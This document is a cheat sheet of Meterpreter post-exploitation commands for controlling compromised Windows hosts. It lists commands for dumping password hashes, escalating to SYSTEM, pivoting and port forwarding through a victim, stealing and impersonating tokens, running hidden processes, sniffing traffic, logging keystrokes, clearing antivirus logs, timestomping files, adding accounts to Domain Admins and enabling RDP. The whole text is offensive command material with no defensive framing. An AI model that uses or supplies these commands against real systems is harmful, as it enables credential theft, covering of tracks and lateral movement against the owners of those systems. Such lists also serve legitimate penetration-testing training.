Basic Commands
sysinfo
getpid
getuid
ps
ps -S notepad.exe
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background
File System Commands
ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd
Port Forwarding
We have compromised victim1 with Meterpreter session session_id. Background the Meterpreter session and add the route below. It will redirect all traffic for the victim2_subnet through victim1.
route add <victim2_subnet> <netmask> <session_id>
route -h
route list
route delete <victim2_subnet> <netmask> <session_id>
Forwards traffic from local port -l on Kali (localhost) to port -p on Target2 (-r) through the compromised Target1:
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd delete -l 1111 -p 2222 -r Target2
Execute Processes
Execute cmd.exe and interact with it:
execute -f cmd.exe -i
Execute cmd.exe with all available tokens:
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens and make it a hidden process:
execute -f cmd.exe -i -H -t
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memory
-t Execute process with currently impersonated thread token
run <scriptname>
Registry
Interact, create, delete, query, set, and much more in the target's registry.
reg <command> [OPTIONS]
Commands:
enumkey -> Enumerate the supplied registry key
createkey / deletekey -> Create/delete the supplied registry key
setval / queryval -> Set/query values from the supplied registry key
Options:
-d -> Data to store in the registry value
-k -> The registry key
-v -> The registry value name
Tokens
use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self
Sniffing
use sniffer
sniffer_interfaces
sniffer_dump interfaceID pcapname
sniffer_start interfaceID packet-buffer
sniffer_stats interfaceID
sniffer_stop interfaceID
Post Exploitation
add_user username password -h ip
add_group_user "Domain Admins" username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop
shutdown
reboot
run post/windows/manage/enable_rdp
Run msfmap
Download it from http://code.google.com/p/msfmap
load msfmap
msfmap